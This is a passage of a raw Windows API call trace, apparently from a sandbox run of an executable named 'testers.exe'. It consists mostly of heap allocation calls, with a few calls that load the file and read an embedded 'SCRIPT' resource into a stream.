[0071.085] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x67a930 [0071.085] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x673a78 [0071.086] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x67a948 [0071.086] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67a900 | out: hHeap=0x650000) returned 1 [0071.086] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x673a48 | out: hHeap=0x650000) returned 1 [0071.086] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x67a900 [0071.086] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x673a48 [0071.086] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x673a88 [0071.086] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x67ace8 [0071.086] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x673a98 [0071.086] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x67a960 [0071.086] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67a900 | out: hHeap=0x650000) returned 1 [0071.086] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x673a48 | out: hHeap=0x650000) returned 1 [0071.086] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6633d0 | out: hHeap=0x650000) returned 1 [0071.086] IsDebuggerPresent () returned 0 [0071.086] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\testers.exe", nBufferLength=0x7fff, lpBuffer=0x5ff7e8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\testers.exe", lpFilePart=0x0) returned 0x31 [0071.086] GetLongPathNameW (in: lpszShortPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\testers.exe", lpszLongPath=0x5ff7e8, cchBuffer=0x7fff | out: lpszLongPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\testers.exe") returned 0x31 [0071.087] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x6633d0 [0071.087] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x673a48 [0071.087] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\testers.exe", nBufferLength=0x7fff, lpBuffer=0x5ff7b8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\testers.exe", lpFilePart=0x0) returned 0x31 [0071.087] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6633d0 | out: hHeap=0x650000) returned 1 [0071.087] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x70) returned 0x67af08 [0071.087] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x676660 [0071.087] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x6633d0 [0071.087] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x676688 [0071.087] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x673aa8 [0071.087] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0071.088] GetProcAddress (hModule=0x76d30000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76d5d650 [0071.088] Wow64DisableWow64FsRedirection (in: OldValue=0x60f754 | out: OldValue=0x60f754*=0x0) returned 1 [0071.088] FreeLibrary (hLibModule=0x76d30000) returned 1 [0071.088] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\testers.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\testers.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x60f5f0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0071.088] GetFileType (hFile=0xf8) returned 0x1 [0071.088] LoadLibraryExW (lpLibFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\testers.exe", hFile=0x0, dwFlags=0x2) returned 0x10000 [0071.088] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0071.088] GetProcAddress (hModule=0x76d30000, lpProcName="Wow64RevertWow64FsRedirection") returned 0x76d5d668 [0071.088] Wow64RevertWow64FsRedirection (OlValue=0x0) returned 1 [0071.089] FreeLibrary (hLibModule=0x76d30000) returned 1 [0071.089] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10000) returned 0x67af80 [0071.089] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x673ab8 [0071.089] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x60f784 | out: ppstm=0x60f784*=0x6766b0) returned 0x0 [0071.089] FindResourceExW (hModule=0x10000, lpType=0xa, lpName="SCRIPT", wLanguage=0x0) returned 0xd8528 [0071.089] LoadResource (hModule=0x10000, hResInfo=0xd8528) returned 0xe07b8 [0071.089] SizeofResource (hModule=0x10000, hResInfo=0xd8528) returned 0x93fa [0071.089] LockResource (hResData=0xe07b8) returned 0xe07b8 [0071.089] ISequentialStream:RemoteWrite (in: This=0x6766b0, pv=0xe07b8*=0xa3, cb=0x93fa, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0071.089] IStream:RemoteSeek (in: This=0x6766b0, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0071.089] IStream:RemoteSeek (in: This=0x6766b0, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0071.089] ISequentialStream:RemoteRead (in: This=0x6766b0, pv=0x67af80, cb=0x18, pcbRead=0x60f6dc | out: pv=0x67af80*=0xa3, pcbRead=0x60f6dc*=0x18) returned 0x0 [0071.089] IStream:RemoteSeek (in: This=0x6766b0, dlibMove=0x14, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0071.089] ISequentialStream:RemoteRead (in: This=0x6766b0, pv=0x60f720, cb=0x4, pcbRead=0x60f6dc | out: pv=0x60f720*=0x45, pcbRead=0x60f6dc*=0x4) returned 0x0 [0071.089] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x673ab8 | out: hHeap=0x650000) returned 1 [0071.089] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67af80 | out: hHeap=0x650000) returned 1 [0071.089] ISequentialStream:RemoteRead (in: This=0x6766b0, pv=0x60f744, cb=0x10, pcbRead=0x60f71c | out: pv=0x60f744*=0x4d, pcbRead=0x60f71c*=0x10) returned 0x0 [0071.089] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x60f618 | out: lpSystemTimeAsFileTime=0x60f618*(dwLowDateTime=0xc8109720, dwHighDateTime=0x1d661bd)) [0071.090] IStream:RemoteSeek (in: This=0x6766b0, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0071.090] IStream:RemoteSeek (in: This=0x6766b0, dlibMove=0x28, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0071.090] ISequentialStream:RemoteRead (in: This=0x6766b0, pv=0x60f098, cb=0x4, pcbRead=0x60ee5c | out: pv=0x60f098*=0x6b, pcbRead=0x60ee5c*=0x4) returned 0x0 [0071.090] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x60ed58 | out: lpSystemTimeAsFileTime=0x60ed58*(dwLowDateTime=0xc8109720, dwHighDateTime=0x1d661bd)) [0071.090] ISequentialStream:RemoteRead (in: This=0x6766b0, pv=0x60f0a0, cb=0x4, pcbRead=0x60ee5c | out: pv=0x60f0a0*=0xa6, pcbRead=0x60ee5c*=0x4) returned 0x0 [0071.090] ISequentialStream:RemoteRead (in: This=0x6766b0, pv=0x60ee88, cb=0x34, pcbRead=0x60ee5c | out: pv=0x60ee88*=0xe1, pcbRead=0x60ee5c*=0x34) returned 0x0 [0071.090] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x60ed58 | out: lpSystemTimeAsFileTime=0x60ed58*(dwLowDateTime=0xc8109720, dwHighDateTime=0x1d661bd)) [0071.090] ISequentialStream:RemoteRead (in: This=0x6766b0, pv=0x60f0a0, cb=0x4, pcbRead=0x60ee5c | out: pv=0x60f0a0*=0x17, pcbRead=0x60ee5c*=0x4) returned 0x0 [0071.090] ISequentialStream:RemoteRead (in: This=0x6766b0, pv=0x60f0cc, cb=0x6e, pcbRead=0x60ee5c | out: pv=0x60f0cc*=0xf9, pcbRead=0x60ee5c*=0x6e) returned 0x0 [0071.090] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x60ed58 | out: lpSystemTimeAsFileTime=0x60ed58*(dwLowDateTime=0xc8109720, dwHighDateTime=0x1d661bd)) [0071.090] IStream:RemoteSeek (in: This=0x6766b0, dlibMove=0x1, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0071.090] ISequentialStream:RemoteRead (in: This=0x6766b0, pv=0x60f090, cb=0x4, pcbRead=0x60ee5c | out: pv=0x60f090*=0xbc, pcbRead=0x60ee5c*=0x4) returned 0x0 [0071.090] IStream:RemoteSeek (in: This=0x6766b0, dlibMove=0x18, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0071.090] ISequentialStream:RemoteRead (in: This=0x6766b0, pv=0x60f098, cb=0x4, pcbRead=0x60ee5c | out: pv=0x60f098*=0x6b, pcbRead=0x60ee5c*=0x4) returned 0x0 [0071.090] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x60ed58 | out: lpSystemTimeAsFileTime=0x60ed58*(dwLowDateTime=0xc8109720, dwHighDateTime=0x1d661bd)) [0071.090] ISequentialStream:RemoteRead (in: This=0x6766b0, pv=0x60f0a0, cb=0x4, pcbRead=0x60ee5c | out: pv=0x60f0a0*=0xaf, pcbRead=0x60ee5c*=0x4) returned 0x0 [0071.090] ISequentialStream:RemoteRead (in: This=0x6766b0, pv=0x60ee88, cb=0x26, pcbRead=0x60ee5c | out: pv=0x60ee88*=0xe6, pcbRead=0x60ee5c*=0x26) returned 0x0 [0071.090] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x60ed58 | out: lpSystemTimeAsFileTime=0x60ed58*(dwLowDateTime=0xc8109720, dwHighDateTime=0x1d661bd)) [0071.090] ISequentialStream:RemoteRead (in: This=0x6766b0, pv=0x60f0a0, cb=0x4, pcbRead=0x60ee5c | out: pv=0x60f0a0*=0x1b, pcbRead=0x60ee5c*=0x4) returned 0x0 [0071.090] ISequentialStream:RemoteRead (in: This=0x6766b0, pv=0x60f0cc, cb=0x76, pcbRead=0x60ee5c | out: pv=0x60f0cc*=0x6b, pcbRead=0x60ee5c*=0x76) returned 0x0 [0071.090] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x60ed58 | out: lpSystemTimeAsFileTime=0x60ed58*(dwLowDateTime=0xc8109720, dwHighDateTime=0x1d661bd)) [0071.090] ISequentialStream:RemoteRead (in: This=0x6766b0, pv=0x60f753, cb=0x1, pcbRead=0x60f0a4 | out: pv=0x60f753*=0x1, pcbRead=0x60f0a4*=0x1) returned 0x0 [0071.090] ISequentialStream:RemoteRead (in: This=0x6766b0, pv=0x60f74c, cb=0x4, pcbRead=0x60f0a4 | out: pv=0x60f74c*=0x86, pcbRead=0x60f0a4*=0x4) returned 0x0 [0071.090] ISequentialStream:RemoteRead (in: This=0x6766b0, pv=0x60f74c, cb=0x4, pcbRead=0x60f0a4 | out: pv=0x60f74c*=0xe4, pcbRead=0x60f0a4*=0x4) returned 0x0 [0071.091] ISequentialStream:RemoteRead (in: This=0x6766b0, pv=0x60f74c, cb=0x4, pcbRead=0x60f0a4 | out: pv=0x60f74c*=0x48, pcbRead=0x60f0a4*=0x4) returned 0x0 [0071.091] IStream:RemoteSeek (in: This=0x6766b0, dlibMove=0x10, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0071.091] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x27c58) returned 0x694398 [0071.091] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x923a) returned 0x67af80 [0071.091] ISequentialStream:RemoteRead (in: This=0x6766b0, pv=0x67af80, cb=0x923a, pcbRead=0x60f0a4 | out: pv=0x67af80*=0x6d, pcbRead=0x60f0a4*=0x923a) returned 0x0 [0071.092] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x60efa0 | out: lpSystemTimeAsFileTime=0x60efa0*(dwLowDateTime=0xc8109720, dwHighDateTime=0x1d661bd)) [0071.094] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20000) returned 0x6bbff8 [0071.094] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10000) returned 0x6dc000 [0071.095] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10000) returned 0x6ec008 [0071.102] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bbff8 | out: hHeap=0x650000) returned 1 [0071.102] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6dc000 | out: hHeap=0x650000) returned 1 [0071.102] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6ec008 | out: hHeap=0x650000) returned 1 [0071.102] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67af80 | out: hHeap=0x650000) returned 1 [0071.102] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x82e4) returned 0x67af80 [0071.102] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1c) returned 0x676700 [0071.102] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x676700 | out: hHeap=0x650000) returned 1 [0071.102] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x676700 [0071.102] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x67a900 [0071.102] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x676728 [0071.102] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x67a978 [0071.102] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67a900 | out: hHeap=0x650000) returned 1 [0071.102] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xa) returned 0x67a900 [0071.102] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x67a990 [0071.102] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x673ab8 [0071.102] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67a990 | out: hHeap=0x650000) returned 1 [0071.102] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x673ab8 | out: hHeap=0x650000) returned 1 [0071.102] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67a900 | out: hHeap=0x650000) returned 1 [0071.102] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x67a900 [0071.102] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1e) returned 0x676750 [0071.102] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x67a990 [0071.102] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x676778 [0071.102] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x673ab8 [0071.102] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x676750 | out: hHeap=0x650000) returned 1 [0071.103] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x67a9a8 [0071.103] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x67a9c0 [0071.103] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67a990 | out: hHeap=0x650000) returned 1 [0071.103] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x67a990 [0071.103] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x67a9d8 [0071.103] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x67a9f0 [0071.103] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x67aa08 [0071.103] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x673ac8 [0071.103] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67a9d8 | out: hHeap=0x650000) returned 1 [0071.103] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x67a9d8 [0071.103] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x67aa20 [0071.103] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67a9f0 | out: hHeap=0x650000) returned 1 [0071.103] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x67a9f0 [0071.103] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x67aa38 [0071.103] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x67aa50 [0071.103] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x67aa68 [0071.103] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x673ad8 [0071.103] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67aa38 | out: hHeap=0x650000) returned 1 [0071.103] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x67aa38 [0071.103] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x67aa80 [0071.103] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67aa50 | out: hHeap=0x650000) returned 1 [0071.103] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x67aa50 [0071.103] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x673ae8 [0071.103] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x67aa98 [0071.103] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x67aab0 [0071.103] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x683288 [0071.103] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x673ae8 | out: hHeap=0x650000) returned 1 [0071.103] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x67aac8 [0071.103] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x67aae0 [0071.104] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67aa98 | out: hHeap=0x650000) returned 1 [0071.104] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x662388 [0071.104] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x676700 | out: hHeap=0x650000) returned 1 [0071.104] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x67aa98 [0071.104] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x12) returned 0x67a750 [0071.104] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x67aaf8 [0071.104] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x676700 [0071.104] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x673ae8 [0071.104] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67a750 | out: hHeap=0x650000) returned 1 [0071.104] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x67ab10 [0071.104] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x67ab28 [0071.104] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67aaf8 | out: hHeap=0x650000) returned 1 [0071.104] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x67aaf8 [0071.104] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xa) returned 0x67ab40 [0071.104] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x67ab58 [0071.104] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x683298 [0071.104] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67ab58 | out: hHeap=0x650000) returned 1 [0071.104] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683298 | out: hHeap=0x650000) returned 1 [0071.104] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67ab40 | out: hHeap=0x650000) returned 1 [0071.104] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x67ab40 [0071.104] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x67ab58 [0071.104] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xe) returned 0x67ab70 [0071.104] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x67ab88 [0071.104] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x67aba0 [0071.104] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x683298 [0071.104] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67ab70 | out: hHeap=0x650000) returned 1 [0071.104] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x67ab70 [0071.104] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x67abb8 [0071.105] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67ab88 | out: hHeap=0x650000) returned 1 [0071.105] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x67ab88 [0071.105] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x67abd0 [0071.105] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x80) returned 0x683670 [0071.105] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x662388 | out: hHeap=0x650000) returned 1 [0071.105] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x67abe8 [0071.105] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x67ac00 [0071.105] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x67ac18 [0071.105] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x67ac30 [0071.105] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6832a8 [0071.105] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67ac00 | out: hHeap=0x650000) returned 1 [0071.105] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x67ac00 [0071.105] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x67ac48 [0071.105] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67ac18 | out: hHeap=0x650000) returned 1 [0071.105] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x67ac18 [0071.105] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x67ac60 [0071.105] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x67ac78 [0071.105] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xe) returned 0x67ac90 [0071.105] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x67aca8 [0071.105] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x67acc0 [0071.105] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6832b8 [0071.105] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67ac90 | out: hHeap=0x650000) returned 1 [0071.105] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x67ac90 [0071.105] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x683710 [0071.105] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67aca8 | out: hHeap=0x650000) returned 1 [0071.106] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x67aca8 [0071.106] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x683728 [0071.106] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x683740 [0071.106] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x14) returned 0x67a750 [0071.106] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x683758 [0071.106] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x676750 [0071.106] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6832c8 [0071.106] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x67a750 | out: hHeap=0x650000) returned 1 [0071.106] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x683770 [0071.106] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x683788 [0071.106] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683758 | out: hHeap=0x650000) returned 1 [0071.106] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x683758 [0071.106] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x6837a0 [0071.106] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x6837b8 [0071.106] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x6837d0 [0071.106] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x6837e8 [0071.106] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x683800 [0071.106] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6832d8 [0071.106] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6837d0 | out: hHeap=0x650000) returned 1 [0071.106] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x6837d0 [0071.106] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x683818 [0071.106] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6837e8 | out: hHeap=0x650000) returned 1 [0071.106] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x6837e8 [0071.106] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x683830 [0071.107] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x100) returned 0x683af8 [0071.107] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683670 | out: hHeap=0x650000) returned 1 [0071.107] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x683848 [0071.107] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x6767a0 [0071.107] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x683860 [0071.107] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x6767c8 [0071.107] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6832e8 [0071.107] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6767a0 | out: hHeap=0x650000) returned 1 [0071.107] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x683878 [0071.107] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x683890 [0071.107] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x683860 | out: hHeap=0x650000) returned 1 [0071.107] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x683860 [0071.107] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x2) returned 0x6832f8 [0071.107] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x6838a8 [0071.107] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x6838c0 [0071.107] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, 